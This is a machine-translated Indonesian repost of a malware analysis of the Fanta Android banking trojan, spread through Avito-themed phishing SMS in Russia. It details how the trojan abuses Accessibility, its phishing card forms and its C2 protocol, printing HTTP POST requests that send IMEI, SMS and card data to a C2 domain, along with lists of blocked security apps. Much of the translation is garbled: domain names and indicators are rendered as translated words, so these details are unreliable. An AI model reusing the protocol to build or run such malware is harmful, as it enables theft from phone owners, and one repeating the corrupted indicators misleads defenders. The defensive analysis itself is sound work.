ProHoster > blog > berita internet > Leysya, Fanta: taktik baru untuk Trojan Android lama

Leysya, Fanta: taktik baru untuk Trojan Android lama

Leysya, Fanta: taktik baru untuk Trojan Android lama

Suatu hari Anda ingin menjual sesuatu di Avito dan, setelah memposting penjelasan rinci tentang produk Anda (misalnya, modul RAM), Anda akan menerima pesan berikut:

Leysya, Fanta: taktik baru untuk Trojan Android lamaSaat Anda membuka tautan tersebut, Anda akan melihat halaman yang tampaknya tidak berbahaya yang memberi tahu Anda, penjual yang bahagia dan sukses, bahwa pembelian Anda telah dilakukan:

Leysya, Fanta: taktik baru untuk Trojan Android lama
Setelah Anda mengklik tombol "Lanjutkan", file APK akan diunduh ke perangkat Android Anda dengan ikon dan nama yang dapat dipercaya. Anda menginstal aplikasi yang karena alasan tertentu meminta hak AccessibilityService, kemudian beberapa jendela muncul dan dengan cepat menghilang dan ... Itu saja.

Anda pergi untuk memeriksa saldo Anda, tetapi karena alasan tertentu aplikasi perbankan Anda meminta rincian kartu Anda lagi. Setelah memasukkan data, hal buruk terjadi: karena alasan tertentu yang masih tidak dapat Anda pahami, uang mulai hilang dari rekening Anda. Anda mencoba untuk memperbaiki masalahnya, tetapi telepon Anda menolak: telepon menekan tombol kembali dan home sendiri, tidak mati dan tidak mengizinkan Anda untuk mengaktifkan tindakan keamanan apa pun. Alhasil Anda dibiarkan tanpa uang, produk Anda tidak terbeli, Anda bingung dan bertanya-tanya: apa yang terjadi?

Jawabannya sederhana: Anda adalah korban trojan Fanta Android, keluarga Flexnet. Bagaimana hal itu terjadi? Sekarang mari kita jelaskan.

Penulis: Andrey Polovinkin, Analis Kode Berbahaya Junior, Ivan Pisarev, Analis Kode Berbahaya.

Beberapa statistik

Keluarga Trojan Android Flexnet pertama kali dilaporkan pada tahun 2015. Selama periode aktivitas yang cukup lama, keluarga ini telah berkembang menjadi beberapa subspesies: Fanta, Limebot, Lipton, dll. Trojan, serta infrastruktur yang terkait dengannya, tidak tinggal diam: skema distribusi baru yang efektif sedang dikembangkan - dalam kasus kami, halaman phishing berkualitas tinggi ditujukan untuk pengguna-penjual tertentu, dan pengembang Trojan mengikuti tren mode. penulisan virus - mereka menambahkan fungsionalitas baru yang memungkinkan pencurian uang dengan lebih efisien dari perangkat yang terinfeksi dan melewati mekanisme perlindungan.

Kampanye yang dijelaskan dalam artikel ini ditujukan untuk pengguna dari Rusia, sejumlah kecil perangkat yang terinfeksi tercatat di Ukraina, dan bahkan lebih sedikit lagi di Kazakhstan dan Belarus.

Meskipun Flexnet telah berada di arena Trojan Android selama lebih dari 4 tahun dan telah dipelajari secara ekstensif oleh banyak peneliti, Flexnet masih dalam kondisi yang baik. Mulai Januari 2019, potensi kerusakan lebih dari 35 juta rubel - dan ini hanya untuk kampanye di Rusia. Pada tahun 2015, berbagai versi Trojan Android ini dijual di forum bawah tanah, di mana Anda juga dapat menemukan kode sumber Trojan dengan penjelasan rinci. Artinya, statistik kerusakan di dunia bahkan lebih mengesankan. Bukan angka yang buruk untuk orang tua seperti itu, bukan?

Leysya, Fanta: taktik baru untuk Trojan Android lama

Dari penjualan hingga penipuan

Seperti yang terlihat dari tangkapan layar halaman phishing yang disajikan sebelumnya di bawah layanan Internet untuk memasang iklan Avito, itu disiapkan untuk korban tertentu. Rupanya, penyerang menggunakan salah satu parser Avito, mengeluarkan nomor telepon dan nama penjual, serta deskripsi produk. Setelah menyebarkan halaman dan menyiapkan file APK, pesan SMS dikirim ke korban dengan namanya dan link ke halaman phishing yang berisi deskripsi produknya dan jumlah yang diterima dari “penjualan” produk tersebut. Dengan mengklik tombol tersebut, pengguna menerima file APK berbahaya - Fanta.

Studi terhadap domain shcet491[.]ru menunjukkan bahwa domain tersebut didelegasikan ke server DNS Hostinger:

  • ns1.hostinger.ru
  • ns2.hostinger.ru
  • ns3.hostinger.ru
  • ns4.hostinger.ru

File zona domain berisi entri yang menunjuk ke alamat IP 31.220.23[.]236, 31.220.23[.]243, dan 31.220.23[.]235. Namun, catatan sumber daya master domain (A-record) menunjuk ke server dengan alamat IP 178.132.1[.]240.

Alamat IP 178.132.1[.]240 berlokasi di Belanda dan milik hoster aliran dunia. Alamat IP 31.220.23[.]235, 31.220.23[.]236 dan 31.220.23[.]243 berlokasi di Inggris dan milik server hosting bersama HOSTINGER. Digunakan sebagai pendaftar openprov-ru. Domain juga diselesaikan ke alamat IP 178.132.1[.]240:

  • sdelka-ru[.]ru
  • produk-av[.]ru
  • produk av[.]ru
  • en-kesepakatan[.]en
  • shcet382[.]ru
  • sdelka221[.]en
  • sdelka211[.]en
  • vyplata437[.]ru
  • viplata291[.]en
  • terjemahan273[.]en
  • terjemahan901[.]en

Perlu dicatat bahwa tautan dengan format berikut tersedia di hampir semua domain:

http://(www.){0,1}<%domain%>/[0-9]{7}

Templat ini juga menyertakan tautan dari pesan SMS. Berdasarkan data historis, ditemukan bahwa beberapa tautan menurut pola di atas berhubungan dengan satu domain, yang menunjukkan penggunaan satu domain untuk mendistribusikan Trojan ke beberapa korban.

Mari kita lompat ke depan sedikit: sebagai server kontrol, Trojan yang diunduh dari tautan dari SMS menggunakan alamat tersebut klub onuseseddohap[.]. Domain ini didaftarkan pada 2019-03-12, dan mulai 2019-04-29, aplikasi APK berinteraksi dengan domain ini. Berdasarkan data yang diperoleh dari VirusTotal, total ada 109 aplikasi yang berinteraksi dengan server ini. Domain itu sendiri diselesaikan menjadi alamat IP 217.23.14[.]27, berlokasi di Belanda dan dimiliki oleh hoster aliran dunia. Digunakan sebagai pendaftar namecheap. Domain juga telah diselesaikan ke alamat IP ini klub rakun[.]buruk (mulai tanggal 2018-09-25) dan rakun nakal[.]hidup (mulai tanggal 2018-10-25). dengan domain klub rakun[.]buruk berinteraksi dengan lebih dari 80 file APK, dengan rakun nakal[.]hidup - lebih dari 100.

Secara umum jalannya serangan adalah sebagai berikut:

Leysya, Fanta: taktik baru untuk Trojan Android lama

Apa yang ada di balik sampul Fanta?

Seperti banyak Trojan Android lainnya, Fanta mampu membaca dan mengirim pesan SMS, membuat permintaan USSD, dan menampilkan jendelanya sendiri di atas aplikasi (termasuk aplikasi perbankan). Namun, fungsionalitas keluarga ini telah tiba di gudang senjata: Fanta mulai digunakan Layanan Aksesibilitas untuk berbagai tujuan: membaca konten notifikasi aplikasi lain, mencegah deteksi dan menghentikan eksekusi Trojan pada perangkat yang terinfeksi, dll. Fanta berfungsi di semua versi Android yang lebih lama dari 4.4. Pada artikel kali ini, kita akan melihat lebih dekat contoh Fanta berikut:

  • MD5: 0826bd11b2c130c4c8ac137e395ac2d4
  • SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
  • SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

Segera setelah peluncuran

Segera setelah diluncurkan, Trojan menyembunyikan ikonnya. Aplikasi hanya dapat berfungsi jika nama perangkat yang terinfeksi tidak ada dalam daftar:

  • android_x86
  • VirtualBox
  • Nexus 5X (bodoh)
  • Nexus 5 (pisau cukur)

Pemeriksaan ini dilakukan di layanan Trojan utama - Layanan Utama. Selama peluncuran pertama, parameter konfigurasi aplikasi diinisialisasi dengan nilai default (format penyimpanan data konfigurasi dan artinya akan dibahas nanti), serta pendaftaran perangkat baru yang terinfeksi di server kontrol. Permintaan HTTP POST akan dikirim ke server dengan jenis pesan daftar_bot dan informasi tentang perangkat yang terinfeksi (versi Android, IMEI, nomor telepon, nama operator, dan kode negara tempat operator terdaftar). Alamat digunakan sebagai server manajemen hXXp://onuseseddohap[.]club/controller.php. Sebagai tanggapan, server mengirimkan pesan yang berisi kolom bot_id, bot_pwd, Server — nilai-nilai ini disimpan oleh aplikasi sebagai parameter server CnC. Parameter Server opsional jika kolom tidak diterima: Fanta menggunakan alamat pendaftaran - hXXp://onuseseddohap[.]club/controller.php. Fungsi mengubah alamat CnC dapat digunakan untuk menyelesaikan dua masalah: untuk mendistribusikan beban secara merata antara beberapa server (dengan sejumlah besar perangkat yang terinfeksi, beban pada server web yang tidak dioptimalkan bisa menjadi tinggi), dan juga untuk menggunakan alternatif server jika terjadi kegagalan salah satu server CnC.

Jika terjadi kesalahan saat mengirimkan permintaan, Trojan akan mengulangi proses registrasi setelah 20 detik.

Setelah berhasil mendaftarkan perangkat, Fanta akan menampilkan pesan berikut kepada pengguna:

Leysya, Fanta: taktik baru untuk Trojan Android lama
Catatan penting: layanan dipanggil Keamanan sistem - nama layanan Trojan, dan setelah mengklik tombol ОК sebuah jendela dengan pengaturan Aksesibilitas perangkat yang terinfeksi akan terbuka, di mana pengguna harus memberikan hak Aksesibilitas untuk layanan jahat itu sendiri:

Leysya, Fanta: taktik baru untuk Trojan Android lama
Setelah pengguna menyala Layanan Aksesibilitas, Fanta mengakses konten jendela aplikasi dan tindakan yang dilakukan di dalamnya:

Leysya, Fanta: taktik baru untuk Trojan Android lama
Segera setelah memperoleh hak Aksesibilitas, Trojan meminta hak administrator dan hak untuk membaca pemberitahuan:

Leysya, Fanta: taktik baru untuk Trojan Android lama
Dengan bantuan AccessibilityService, aplikasi mensimulasikan penekanan tombol, sehingga memberikan semua hak yang diperlukan.

Fanta membuat beberapa contoh database (yang akan dijelaskan nanti) yang diperlukan untuk menyimpan data konfigurasi, serta informasi tentang perangkat terinfeksi yang dikumpulkan selama proses tersebut. Untuk mengirimkan informasi yang dikumpulkan, Trojan membuat tugas berulang yang dirancang untuk membongkar kolom dari database dan menerima perintah dari server kontrol. Interval untuk memanggil CnC diatur tergantung pada versi Android: dalam kasus 5.1, intervalnya adalah 10 detik, jika tidak, 60 detik.

Untuk menerima perintah, Fanta membuat permintaan Dapatkan Tugas ke server kontrol. Sebagai tanggapan, CnC dapat mengirimkan salah satu perintah berikut:

Tim Описание
0 Kirim pesan SMS
1 Lakukan panggilan telepon atau perintah USSD
2 Memperbarui parameter selang
3 Memperbarui parameter mencegat
6 Memperbarui parameter manajer sms
9 Mulai kumpulkan pesan SMS
11 Reset telepon ke pengaturan pabrik
12 Mengaktifkan/Menonaktifkan pencatatan pembuatan kotak dialog

Fanta juga mengumpulkan notifikasi dari 70 aplikasi perbankan, pembayaran cepat dan e-wallet dan menyimpannya dalam database.

Penyimpanan parameter konfigurasi

Untuk menyimpan parameter konfigurasi, Fanta menggunakan pendekatan standar untuk platform Android - preferensi-file. Pengaturan akan disimpan ke file bernama pengaturan. Deskripsi parameter yang disimpan ada pada tabel di bawah.

nama Nilai default Nilai yang mungkin Описание
id 0 Bilangan bulat ID Bot
Server hXXp://onuseseddohap[.]klub/ URL Alamat server manajemen
pwd - Tali Password server
selang 20 Bilangan bulat Jarak waktu. Menunjukkan berapa lama untuk menunda tugas-tugas berikut:

  • Saat mengirim permintaan tentang status pesan SMS yang dikirim
  • Menerima perintah baru dari server kontrol
mencegat semua semua/Nomor Telp Jika bidang sama dengan string semua или nomor telp, maka pesan SMS yang diterima akan disadap oleh aplikasi dan tidak ditampilkan kepada pengguna
manajer sms 0 0/1 Mengaktifkan/menonaktifkan aplikasi sebagai penerima SMS default
bacaDialog palsu Benar salah Aktifkan/Nonaktifkan pencatatan peristiwa Acara Aksesibilitas

Fanta juga menggunakan file tersebut manajer sms:

nama Nilai default Nilai yang mungkin Описание
pcg - Tali Nama pengelola SMS yang digunakan

Interaksi basis data

Trojan menggunakan dua database selama operasinya. Basis data bernama a digunakan untuk menyimpan berbagai informasi yang dikumpulkan dari telepon. Basis data kedua diberi nama fanta.db dan digunakan untuk menyimpan pengaturan yang bertanggung jawab untuk membuat jendela phishing yang dirancang untuk mengumpulkan informasi tentang kartu bank.

Trojan menggunakan basis data а untuk menyimpan informasi yang dikumpulkan dan mencatat tindakan mereka. Data disimpan dalam sebuah tabel log. Kueri SQL berikut digunakan untuk membuat tabel:

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)

Basis data berisi informasi berikut:

1. Masuk ke perangkat yang terinfeksi dengan pesan Telepon dihidupkan!

2. Notifikasi dari aplikasi. Pesan dibentuk sesuai dengan templat berikut:

(<%App Name%>)<%Title%>: <%Notification text%>

3. Data kartu bank dari formulir phishing yang dibuat oleh Trojan. Parameter LIHAT_NAME bisa menjadi salah satu daftarnya:

  • AliExpress
  • Avito
  • Google Play
  • Lain-lain <%Nama Aplikasi%>

Pesan tersebut dicatat dalam format:

[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>

4. Pesan SMS masuk/keluar dengan format :

([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>

5. Informasi tentang paket yang membuat kotak dialog dengan format:

(<%Package name%>)<%Package information%>

Contoh tabel log:

Leysya, Fanta: taktik baru untuk Trojan Android lama
Salah satu fungsi Fanta adalah pengumpulan informasi tentang kartu bank. Data dikumpulkan dengan membuat jendela phishing saat membuka aplikasi perbankan. Trojan menciptakan jendela phishing hanya sekali. Informasi yang ditampilkan jendela kepada pengguna disimpan dalam tabel pengaturan dalam database fanta.db. Kueri SQL berikut digunakan untuk membuat database:

create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);

Semua bidang tabel pengaturan diinisialisasi ke 1 (membuat jendela phishing) secara default. Setelah pengguna memasukkan datanya, nilainya akan disetel ke 0. Contoh bidang tabel pengaturan:

  • bisa_login — field bertanggung jawab untuk menampilkan formulir saat membuka aplikasi perbankan
  • bank_pertama - tidak digunakan
  • bisa_avito - field bertanggung jawab untuk menampilkan formulir saat membuka aplikasi Avito
  • bisa_ali - bidang bertanggung jawab untuk menampilkan formulir saat membuka aplikasi Aliexpress
  • bisa_yang lain - bidang ini bertanggung jawab untuk menampilkan formulir saat membuka aplikasi apa pun dari daftar: Yula, Pandao, Drome Auto, Dompet. Kartu diskon dan bonus, Aviasales, Pemesanan, Trivago
  • kaleng_kartu - bidang bertanggung jawab untuk menampilkan formulir saat dibuka Google Play

Interaksi dengan server kontrol

Interaksi jaringan dengan server kontrol terjadi melalui protokol HTTP. Fanta menggunakan perpustakaan Retrofit yang populer untuk bekerja dengan jaringan. Permintaan dikirim ke hXXp://onuseseddohap[.]club/controller.php. Alamat server dapat diubah saat mendaftar di server. Cookie dapat dikembalikan dari server. Fanta membuat permintaan berikut ke server:

  • Pendaftaran bot di server kontrol terjadi satu kali pada permulaan pertama. Data berikut tentang perangkat yang terinfeksi dikirim ke server:
    · Kue - cookie diterima dari server (nilai default adalah string kosong)
    · mode - konstanta string daftar_bot
    · awalan - konstanta bilangan bulat 2
    · versi_sdk - dibentuk menurut template berikut: <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
    · imei — IMEI perangkat yang terinfeksi
    · negara — kode negara tempat operator terdaftar, dalam format ISO
    · jumlah - nomor telepon
    · operator - nama operator

    Contoh permintaan yang dikirim ke server:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>

    Menanggapi permintaan tersebut, server harus mengembalikan objek JSON yang berisi parameter berikut:
    bot_id — pengidentifikasi perangkat yang terinfeksi. Jika bot_id sama dengan 0, Fanta akan mengeksekusi kembali permintaan tersebut.
    bot_pwd - kata sandi untuk server.
    server — alamat server kontrol. Parameter opsional. Jika parameter tidak ditentukan, alamat yang disimpan dalam aplikasi akan digunakan.

    Contoh objek JSON:

    {
    "response":[
   	 {
   		 "bot_id": <%BOT_ID%>,
   		 "bot_pwd": <%BOT_PWD%>,
   		 "server": <%SERVER%>
   	 }
    ],
    "status":"ok"
}

  • Permintaan untuk menerima perintah dari server. Data berikut dikirim ke server:
    · Kue — cookie diterima dari server
    · tawaran — id perangkat terinfeksi yang diterima saat mengirim permintaan daftar_bot
    · pwd -kata sandi untuk server
    · perangkat_admin - bidang menentukan apakah hak administrator telah diperoleh. Jika hak administrator telah diperoleh, bidangnya sama dengan 1, sebaliknya 0
    · Aksesibilitas - status Layanan Aksesibilitas. Jika layanan dimulai, nilainya adalah 1, sebaliknya 0
    · Manajer SMS - menunjukkan apakah trojan diaktifkan sebagai aplikasi default untuk menerima SMS
    · layar — menunjukkan status layar saat ini. nilai akan ditetapkan 1jika layar menyala, sebaliknya 0;

    Contoh permintaan yang dikirim ke server:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>

    Bergantung pada perintahnya, server dapat mengembalikan objek JSON dengan parameter berbeda:

    · Tim Kirim pesan SMS: Parameternya berisi nomor telepon, teks pesan SMS dan pengenal pesan yang akan dikirim. Pengidentifikasi digunakan saat mengirim pesan ke server dengan tipe setSmsStatus. 

    {
    "response":
    [
   	 {
   		 "mode": 0,
   		 "sms_number": <%SMS_NUMBER%>,
   		 "sms_text": <%SMS_TEXT%>,
   		 "sms_id": %SMS_ID%
   	 }
    ],
    "status":"ok"
}

    · Tim Lakukan panggilan telepon atau perintah USSD: Nomor telepon atau perintah ada di isi tanggapan. 

    {
    "response":
    [
   	 {
   		 "mode": 1,
   		 "command": <%TEL_NUMBER%>
   	 }
    ],
    "status":"ok"
}

    · Tim Ubah parameter interval. 

    {
    "response":
    [
   	 {
   		 "mode": 2,
   		 "interval": <%SECONDS%>
   	 }
    ],
    "status":"ok"
}

    · Tim Ubah parameter intersep. 

    {
    "response":
    [
   	 {
   		 "mode": 3,
   		 "intercept": "all"/"telNumber"/<%ANY_STRING%>
   	 }
    ],
    "status":"ok"
}

    · Tim Ubah bidang SmsManager. 

    {
    "response":
    [
   	 {
   		 "mode": 6,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}

    · Tim Kumpulkan pesan SMS dari perangkat yang terinfeksi.

    {
    "response":
    [
   	 {
   		 "mode": 9
   	 }
    ],
    "status":"ok"
}

    · Tim Reset telepon ke pengaturan pabrik: 

    {
    "response":
    [
   	 {
   		 "mode": 11
   	 }
    ],
    "status":"ok"
}

    · Tim Ubah pengaturan ReadDialog. 

    {
    "response":
    [
   	 {
   		 "mode": 12,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}

  • Mengirim pesan dengan tipe setSmsStatus. Permintaan ini dibuat setelah eksekusi perintah Kirim pesan SMS. Permintaannya terlihat seperti ini:

POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>

  • Mengirimkan isi database. Satu string ditransfer per permintaan. Data berikut dikirim ke server:
    · Kue — cookie diterima dari server
    · mode - konstanta string setSimpanInboxSms
    · tawaran — id perangkat terinfeksi yang diterima saat mengirim permintaan daftar_bot
    · teks — teks dalam catatan database saat ini (field d dari meja log dalam database а)
    · jumlah — nama rekaman database saat ini (field p dari meja log dalam database а)
    · sms_mode — nilai integer (bidang m dari meja log dalam database а)

    Permintaannya terlihat seperti ini:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>

    Setelah pengiriman berhasil ke server, baris tersebut akan dihapus dari tabel. Contoh objek JSON yang dikembalikan oleh server:

    {
    "response":[],
    "status":"ok"
}

Interaksi dengan AccessibilityService

AccessibilityService diterapkan untuk memudahkan penyandang disabilitas menggunakan perangkat Android. Dalam kebanyakan kasus, interaksi fisik diperlukan untuk berinteraksi dengan suatu aplikasi. AccessibilityService memungkinkan Anda membuatnya secara terprogram. Fanta menggunakan layanan ini untuk membuat jendela palsu di aplikasi perbankan dan mencegah pengaturan sistem dan beberapa aplikasi dibuka.

Dengan menggunakan fungsionalitas AccessibilityService, Trojan memonitor perubahan elemen pada layar perangkat yang terinfeksi. Seperti dijelaskan sebelumnya, pengaturan Fanta berisi parameter yang bertanggung jawab untuk operasi logging dengan kotak dialog - bacaDialog. Jika opsi ini disetel, informasi tentang nama dan deskripsi paket yang memicu peristiwa tersebut akan ditambahkan ke database. Trojan melakukan tindakan berikut ketika dipicu:

  • Mensimulasikan penekanan tombol kembali dan pulang jika:
    · jika pengguna ingin me-reboot perangkatnya
    · jika pengguna ingin menghapus aplikasi “Avito” atau mengubah hak akses
    · jika ada penyebutan aplikasi “Avito” di halaman tersebut
    · saat Anda membuka aplikasi “Google Play Protect”.
    · saat membuka halaman dengan pengaturan AccessibilityService
    · ketika kotak dialog Keamanan Sistem muncul
    · saat membuka halaman dengan pengaturan “Draw over other app”
    · ketika Anda membuka halaman “Aplikasi”, “Cadangkan dan Reset”, “Reset Data”, “Reset Pengaturan”, “Panel Pengembang”, “Spec. peluang”, “Aksesibilitas”, “Hak khusus”
    · jika acara tersebut dihasilkan oleh aplikasi tertentu.

    daftar aplikasi

    • android
    • Tuan Ringan
    • Guru bersih
    • Bersihkan Master untuk CPU x86
    • Manajemen Izin Permohonan Meizu
    • Keamanan MIUI
    • Clean Master - Antivirus & Pembersih Cache & Sampah
    • Kontrol orang tua dan GPS: Kaspersky SafeKids
    • Kunci Aplikasi Antivirus Kaspersky & Keamanan Web Beta
    • Pembersih Virus, Antivirus, Pembersih (Keamanan MAX)
    • Keamanan AntiVirus Seluler PRO
    • Antivirus Avast & perlindungan gratis 2019
    • MegaFon Keamanan Seluler
    • Perlindungan AVG untuk Xperia
    • Keamanan Seluler
    • Malwarebytes Antivirus & Perlindungan
    • Antivirus untuk Android 2019
    • Master Keamanan - Antivirus, VPN, AppLock, Booster
    • Antivirus AVG untuk tablet Manajer Sistem Huawei
    • Aksesibilitas Samsung
    • Manajer Cerdas Samsung
    • Master Keamanan
    • Penambah kecepatan
    • dr.web
    • Ruang Keamanan Dr.Web
    • Pusat Kontrol Seluler Dr.Web
    • Kehidupan Ruang Keamanan Dr.Web
    • Pusat Kontrol Seluler Dr.Web
    • Antivirus & Keamanan Seluler
    • Keamanan Internet Kaspersky: Antivirus & Perlindungan
    • Masa Pakai Baterai Kaspersky: Penghemat & Penguat
    • Kaspersky Endpoint Security - perlindungan dan manajemen
    • AVG Antivirus gratis 2019 - Perlindungan untuk Android
    • antivirus android
    • Norton Mobile Security dan Antivirus
    • Antivirus, firewall, VPN, keamanan seluler
    • Keamanan Seluler: Antivirus, VPN, Anti-Pencurian
    • Antivirus untuk Android

  • Jika izin diminta saat mengirim pesan SMS ke nomor pendek, Fanta mensimulasikan mengklik kotak centang Ingat pilihan dan tombol kirim.
  • Saat Anda mencoba mengambil hak administrator dari Trojan, ia memblokir layar ponsel.
  • Mencegah penambahan administrator baru.
  • Jika aplikasi antivirus dr.web mendeteksi ancaman, Fanta mensimulasikan penekanan tombol mengabaikan.
  • Trojan tersebut mensimulasikan penekanan tombol kembali dan beranda jika peristiwa tersebut dihasilkan oleh aplikasi Perawatan Perangkat Samsung.
  • Fanta membuat jendela phishing dengan formulir untuk memasukkan informasi tentang kartu bank jika aplikasi dari daftar sekitar 30 layanan Internet berbeda diluncurkan. Diantaranya: AliExpress, Booking, Avito, Google Play Market Component, Pandao, Drome Auto, dll.

    Formulir Phishing

    Fanta menganalisis aplikasi mana yang berjalan pada perangkat yang terinfeksi. Jika aplikasi yang diinginkan telah dibuka, Trojan akan menampilkan jendela phishing di atas yang lainnya, yaitu formulir untuk memasukkan informasi tentang kartu bank. Pengguna perlu memasukkan data berikut:

    • Nomor kartu
    • Tanggal kadaluarsa kartu
    • CVV
    • Nama pemegang kartu (tidak untuk semua bank)

    Tergantung pada aplikasi yang berjalan, jendela phishing yang berbeda akan ditampilkan. Berikut ini adalah contoh beberapa di antaranya:

    AliExpress:

    Leysya, Fanta: taktik baru untuk Trojan Android lama
    Otomatis:

    Leysya, Fanta: taktik baru untuk Trojan Android lama
    Untuk beberapa aplikasi lain seperti Google Play Market, Aviasales, Pandao, Pemesanan, Trivago:
    Leysya, Fanta: taktik baru untuk Trojan Android lama

    Bagaimana sebenarnya keadaannya

    Untungnya, orang yang menerima pesan SMS yang dijelaskan di awal artikel ternyata adalah seorang spesialis keamanan siber. Oleh karena itu, versi non-sutradara yang sebenarnya berbeda dengan yang diceritakan sebelumnya: orang tersebut menerima SMS menarik, setelah itu dia memberikannya kepada tim Intelijen Pemburu Ancaman Grup-IB. Akibat dari serangan tersebut adalah artikel ini. Akhir yang bahagia, bukan? Namun, tidak semua cerita berakhir dengan baik, dan agar cerita Anda tidak terlihat seperti sutradara yang kehilangan uang, dalam banyak kasus, cukup mematuhi aturan yang telah lama dijelaskan berikut ini:

    • Jangan memasang aplikasi untuk perangkat seluler Android Anda dari sumber apa pun selain Google Play
    • saat menginstal aplikasi, berikan perhatian khusus pada hak yang diminta oleh aplikasi tersebut
    • perhatikan ekstensi file yang diunggah
    • instal pembaruan OS Android secara teratur
    • jangan kunjungi sumber yang mencurigakan dan jangan mengunduh file dari sana
    • Jangan klik tautan yang diterima dalam pesan SMS.

Sumber: www.habr.com

Tambah komentar